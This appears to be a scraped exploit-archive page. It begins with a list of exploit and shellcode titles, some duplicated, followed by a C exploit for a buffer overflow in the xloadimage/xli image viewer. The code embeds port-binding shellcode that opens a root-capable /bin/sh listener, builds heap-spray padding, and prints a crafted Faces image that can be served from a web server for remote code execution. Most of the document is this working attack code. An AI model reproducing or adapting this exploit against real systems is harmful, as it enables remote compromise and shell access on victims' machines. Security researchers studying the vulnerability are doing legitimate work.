
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
78 lines
No EOL
2.7 KiB
C
78 lines
No EOL
2.7 KiB
C
// source: https://www.securityfocus.com/bid/3006/info
|
|
//
|
|
// xloadimage is a utility used for displaying images of varying formats on X11 servers.
|
|
//
|
|
// xloadimage and possibly derivatives such as 'xli' contain a buffer overflow vulnerability in the handling of the 'Faces Project' image type.
|
|
//
|
|
// It is possible for remote attackers to create a file that will exploit this overflow to execute arbitrary code. An optional netscape plugin shipped with Red Hat powertools invokes xloadimage to load certain image types. If this plugin is in use, this vulnerability may be remotely exploitable if an attacker places the exploit-file on a webserver.
|
|
//
|
|
// S.uS.E. Linux also ships with plugger, which invokes a derivative of xloadimage called 'xli'. 'xli' is also vulnerable.
|
|
|
|
|
|
//#define TARGET 0x080e1337
|
|
//as 1337 as the 1337357 kiddies.
|
|
#define TARGET 0xdeadbeef
|
|
|
|
// lamagra's port binding shell code (from bind.c in the sc.tar.gz)
|
|
//
|
|
char lamagra_bind_code[] =
|
|
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
|
|
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
|
|
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x1d\x29\x89\x4d\xf0"
|
|
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
|
|
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
|
|
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
|
|
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
|
|
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
|
|
|
|
// slight modification so it listens on 7465 instead of 3879
|
|
// TAGS is easier to remember ;]
|
|
|
|
char *
|
|
this (int doit)
|
|
{
|
|
char *p;
|
|
int v;
|
|
p = (char *) malloc (8200);
|
|
memset (p, 0x90, 8200);
|
|
if (!doit)
|
|
for (v = 0; v < 8100; v += 122)
|
|
{
|
|
p[v] = 0xeb;
|
|
p[v + 1] = 120;
|
|
}
|
|
if (doit)
|
|
memcpy (&p[7000], lamagra_bind_code, strlen (lamagra_bind_code));
|
|
p[8199] = 0;
|
|
|
|
return p;
|
|
}
|
|
|
|
main (int argc)
|
|
{
|
|
int z0, x = TARGET;
|
|
int z1, y = x;
|
|
int p;
|
|
char *q;
|
|
if (argc > 1)
|
|
printf ("HTTP/1.0 200\nContent-Type: image/x-tiff\n\n");
|
|
printf ("FirstName: %s\n", this (0));
|
|
printf ("LastName: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");
|
|
printf ("%s\n", &x);
|
|
// Begin Padding Heap With 'Garbage' (nop/jmp)
|
|
printf ("%s", this (0));
|
|
printf ("%s", this (0));
|
|
printf ("%s", this (0));
|
|
printf ("%s", this (0));
|
|
printf ("%s", this (0));
|
|
printf ("%s", this (0));
|
|
// End Padding Heap With 'Garbage' (nop/jmp)
|
|
printf ("%s", this (1));
|
|
printf ("http://www.mp3.com/cosv");
|
|
printf ("\nPicData: 32 32 8\n");
|
|
printf ("\n");
|
|
for (p = 0; p < 9994; p += 1)
|
|
printf ("A");
|
|
}
|
|
|
|
// EOF -- tstot.c --
|